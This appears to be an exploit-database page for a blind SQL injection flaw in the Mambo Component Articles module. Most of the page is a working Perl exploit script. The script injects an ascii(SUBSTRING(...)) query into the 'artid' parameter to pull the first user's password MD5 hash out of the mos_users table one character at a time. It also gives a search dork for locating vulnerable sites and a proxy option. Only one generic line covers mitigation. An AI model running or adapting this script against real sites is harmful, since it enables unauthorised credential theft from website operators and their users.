header-logo
Suggest Exploit
vendor:
Mambo Component Articles
by:
Ded MustD!e
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mambo Component Articles
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Mambo Component Articles Blind SQL Injection Exploit

This exploit is a blind SQL injection vulnerability in the Mambo Component Articles. It allows an attacker to extract the MD5 hash of the password of the first user in the database. The exploit requires a valid article ID and the path to the Mambo Component Articles installation. The exploit works by sending a specially crafted HTTP request to the vulnerable application and then analyzing the response to determine the value of the next character in the MD5 hash.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
 print " \n";
 print " #######################################################################\n";
 print "  #   Mambo Component Articles Blind SQL Injection Exploit #\n";
 print "  #   Author:Ded MustD!e [www.antichat.ru] #\n";
 print "  # #\n";
 print "  #   Dork :   inurl:option=articles artid #\n";
 print "  #   Usage:   perl exploit.pl host path <options> #\n";
 print "  #   Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
 print "  # #\n";
 print "  #   Options: #\n";
 print "  #     -a   valid Article id #\n";
 print " #######################################################################\n";
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
 $userid = $options{"u"};
}

if($options{"a"})
{
 $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
 my $f = 0;
 my $h = 48;
 while(!$f && $h <= 57)
 {
   if(istrue2($host, $path, $userid, $aid, $i, $h))
   {
     $f = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$f)
 {
   $h = 97;
   while(!$f && $h <= 122)
   {
     if(istrue2($host, $path, $userid, $aid, $i, $h))
     {
       $f = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $uid   = shift;
 my $aid   = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent->new;
 my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";

 if($options{"p"})
 {
   $ua->proxy('http', "http://".$options{"p"});
 }

 my $resp = $ua->get($query);
 my $content = $resp->content;
 my $regexp = "Back";

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }

}

# milw0rm.com [2008-06-25]

Navigation

Suggest Exploit

Services By CQR